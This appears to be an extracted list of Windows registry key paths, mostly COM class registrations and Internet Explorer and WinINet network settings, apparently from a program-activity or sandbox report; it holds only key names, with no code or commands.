                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\COM3

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\Com+Enabled

                
                HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\ThreadingModel

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount

                
                HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid

                
                HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32

                
                HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler

                
                HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PASSPORT_SESSION_STORE_KB948608

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_EXCLUDE_INVALID_CLIENT_CERT_KB929477

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PRESERVE_SPACES_IN_FILENAMES_KB952730

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_PROXY_CACHE_REFRESH_KB2983228

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols

                
                HKEY_LOCAL_MACHINE\Software\Policies

                
                HKEY_CURRENT_USER\Software\Policies

                
                HKEY_CURRENT_USER\Software

                
                HKEY_LOCAL_MACHINE\Software

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate

                
                HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AllowOnlyDNSQueryForWPAD

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameTabWindow

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FrameMerging

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SessionMerging

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\AdminTabProcs

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\TabProcGrowth

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache

                
                
            

        

        

            

                
                    
                        DisableUserModeCallbackFilter

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableHHDEP

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52A2AAAE-085D-4187-97EA-8C30DB990436}\InprocServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\D6C3CCFA

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT

                    
